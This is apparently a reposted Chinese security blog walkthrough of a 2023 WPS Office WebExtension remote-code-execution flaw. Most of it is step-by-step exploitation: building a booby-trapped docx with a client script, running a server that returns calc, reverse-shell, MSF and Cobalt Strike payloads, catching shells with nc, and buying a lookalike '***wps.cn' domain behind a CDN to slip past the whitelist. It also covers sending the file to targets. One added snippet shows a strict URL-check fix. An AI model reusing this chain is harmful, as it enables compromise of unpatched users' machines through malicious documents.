[Vulnerability Reproduction] 2023HVV WPS Office Remote Code Execution Vulnerability (RCE)


Preface

The WPS Office vulnerability exposed during 2023HVV is an RCE. An attacker can use it to execute arbitrary commands and obtain control of the server.


Statement

Please do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by disseminating or using the information or tools provided in this article are the responsibility of the user; all adverse consequences are unrelated to the author of this article. This article is for educational purposes only.

1. Vulnerability description

WebExtension in Office (often called Office plug-ins or Office applications) is a technology used to extend the functionality of Microsoft Office. Office plug-ins enable third-party developers to integrate their own services and functions into Office applications. These plug-ins are developed using cross-platform web technologies (such as HTML, CSS and JavaScript) and can run on different platforms and devices.

Put simply, Office has a built-in browser that can parse HTML/JavaScript/CSS. The vulnerability here is that WPS fails to handle JavaScript correctly when processing a WebExtension, resulting in an overflow that leads to RCE (compare the previously disclosed Chrome RCE; the RCE in WeChat for Windows < 3.1.2.141 is similar).


2. Affected versions

  • WPS Office 2023 Personal Edition < 11.1.0.15120
  • WPS Office 2019 Enterprise Edition < 11.8.2.12085

3. Reproducing the vulnerability

Download the vulnerability environment package:
https://official-package.wpscdn.cn/wps/download/WPS_Setup_12300.exe

Server: bind the domain name clientweb.docer.wps.cn.****.wps.cn and start a web service, with the HTML file in the same directory;
Client: inject the payload into a normal docx file using a URL such as https://clientweb.docer.wps.cn/shell/vpsIP/9000, send it to the target host; when the docx is opened, the reverse shell connects back.

Next, we reproduce locally. For local reproduction the hosts file must be modified so that the domain takes the form clientweb.docer.wps.cn.{****}.wps.cn; the hosts file is located at C:\windows\System32\drivers\etc.

For this reproduction, add the hosts entry 127.0.0.1 clientweb.docer.wps.cn.****wps.cn (see the figure). Then start the HTTP service in the POC directory with: py -3 -m http.server 80. Open clientweb.docer.wps.cn.cloudwps.cn in a browser to confirm the service is reachable, then open poc.docx: the calculator pops up.
In addition to reproducing the above methods, the vulnerability can also be further exploited through scripts

github project: wps-rce

  • Install the corresponding dependencies
  • The program requires Python 3.8 or later to run properly

pip3 install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

Server side functions

  • The server's main.py is in the Server directory. This Python script generates the HTML code and also supports generating shell, MSF and CS reverse-connection code.
  • A domain name of the form ****wps.cn must be purchased
  • A VPS must be purchased
  • The domain name clientweb.docer.wps.cn.***wps.cn must be resolved to the VPS

main.py listens on port 80 and therefore requires root privileges. Start the main script service in the Server directory with Python.

  • By default the service listens on port 80 so that it can be bound to the domain name directly.
  • If you want to put Nginx/Caddy in front as a reverse proxy, change the port yourself. The service can then be reached directly at the resolved domain name or at the VPS port.
  • This server is developed from the POC published online; requesting the corresponding path returns the exploitation code for the corresponding program.
  • The URL paths correspond to the payload list for CS and MSF. The service can also be accessed directly by VPS IP; for local testing, bind the hosts entry and access it that way.

After the environment above is configured, prepare the payload URL for testing: http://clientweb.docer.wps.cn.lhhwps.cn/calc, and create a new normal docx document.

Client functions

  • The client's main.py is in the Client directory. This Python script generates the docx files.
  • A normal docx file must be provided; the attack payload is inserted into this docx.
  • It needs to be based on the URL address provided by the server built above, similar to
    https://clientweb.docer.wps.cn.***wps.cn/shell/127.0.0.1/9000

With all of the above prepared, execute the following command:
python3 main.py wps0day.docx http://clientweb.docer.wps.cn.lhhwps.cn/calc
Then download the generated file to the local machine and double-click it: calc is launched successfully.
Beyond launching calc, a reverse shell can also be used: open the shell path in the browser (the parameters after shell can be modified as needed), generate a new docx with the modified address using the script, download the generated file locally and double-click it. The same applies to the other exploit payloads for obtaining a reverse shell.

Tip 1: Local testing

  • Using the docx requires purchasing a ***wps.cn domain name. If you do not have one, you can test locally by editing your machine's hosts file and binding the domain name manually.
  • Install the vulnerable version of WPS and modify the hosts file.
  • Edit C:\Windows\System32\drivers\etc\hosts and add 127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn (this is only for convenient local testing; a domain name must be purchased for actual use).
  • In the hosts entry above, 127.0.0.1 must be set according to the actual situation: it is the IP address of the machine running the server. If the server runs on this machine, 127.0.0.1 is fine; if it runs on another Linux server, confirm that its IP address is reachable.
  • Select the server payload: launch the calculator, reverse shell, MSF or CS.
  • For a reverse shell the generated URL is http://clientweb.docer.wps.cn.cloudwps.cn/shell/1.1.1.1/9000. Here 1.1.1.1 must be changed to the IP of the machine running the nc command (a domain name also works), and 9000 to the port nc listens on. (Note that the IP and nc here are separate and only receive the shell; to keep things simple, you can run nc directly on the machine running the server.)
  • Use the client command to generate the attack docx: python main.py ~/Downloads/temp.docx http://clientweb.docer.wps.cn.cloudwps.cn/shell/1.1.1.1/9000
  • Copy the generated wps_office_rce_***.docx file to the computer where WPS is installed and double-click to open it in the client.

Tip 2: Exploitation restrictions

1. Purchase a domain name of the form ***wps.cn

  • Since the vulnerability is triggered by JavaScript in a WebExtension, a corresponding HTML file has to be prepared. WebExtension supports loading HTML from third-party websites, so a web service must be exposed on the public network to serve the HTML file.
  • Because of a restriction in WPS, loading HTML from a third-party website causes WPS to display a warning, as shown in the picture below. Domains under wps.cn are on WPS's whitelist: as long as the loaded resource is on a wps.cn site, no prompt appears. But we have no control over wps.cn.
  • The whitelist check in WPS is flawed. The code may use a regular expression like http://.*?.wps.cn, which has an obvious gap: hosting the HTML file on a site such as http://hackwps.cn is enough to bypass the check.
  • Therefore exploiting this vulnerability requires purchasing a domain name; it only needs to end in wps.cn, for example hackerwps.cn or xxxwps.cn.
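To make the whitelist flaw concrete, here is an added example (not WPS code, which is not on the page; the weak pattern is the one the post speculates about) contrasting that regex with a hardened check that parses the URL and compares the exact host suffix. Requiring https is my own hardening choice.

```python
import re
from urllib.parse import urlsplit

# Speculated weak check: unanchored, and the '.' before "wps.cn" is a regex
# wildcard, so any host containing "<char>wps<char>cn" passes. Assumption:
# modelled on the pattern the post suspects, not the real WPS source.
WEAK_PATTERN = re.compile(r"http://.*?.wps.cn")


def weak_allowlist(url: str) -> bool:
    """Return True if the speculated regex would accept this URL."""
    return WEAK_PATTERN.search(url) is not None


ALLOWED_APEX = "wps.cn"


def strict_allowlist(url: str) -> bool:
    """Parse the URL, then compare the real host against the allowlist.

    Only https is accepted, and the host must be wps.cn itself or a
    subdomain of it (a dot-separated suffix match, not a substring match).
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    return host == ALLOWED_APEX or host.endswith("." + ALLOWED_APEX)


# Constructed sample URLs: the lookalike hosts from the post and a real one.
SAMPLES = {
    "https://clientweb.docer.wps.cn/x": True,            # genuine subdomain
    "https://hackwps.cn/x": False,                       # suffix lookalike
    "https://clientweb.docer.wps.cn.hackwps.cn/calc": False,
    "https://evil.example/?u=https://wps.cn": False,     # allowlisted text in query
    "http://clientweb.docer.wps.cn/x": False,            # plain http rejected
}


def audit() -> dict:
    """Map each sample URL to (weak_result, strict_result)."""
    return {u: (weak_allowlist(u.replace("https://", "http://", 1)),
                strict_allowlist(u)) for u in SAMPLES}


if __name__ == "__main__":
    for url, (weak, strict) in audit().items():
        print(f"{url}\n  weak={weak} strict={strict} expected={SAMPLES[url]}")
```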

2. Deploy the HTML file to the VPS and bind the domain name to the VPS

  • After purchasing the domain name and VPS, resolve the subdomain clientweb.docer.wps.cn.***wps.cn to the purchased VPS, preferably put a CDN layer in front, and then reverse-proxy with nginx to the deployed service. (Learn and deploy the specific domain name/VPS/CDN setup yourself.)
  • The subdomain must be exactly clientweb.docer.wps.cn.***wps.cn; otherwise it will not pass the whitelist.

4. Remediation

Update to the latest version.

Source: blog.csdn.net/weixin_46944519/article/details/132756250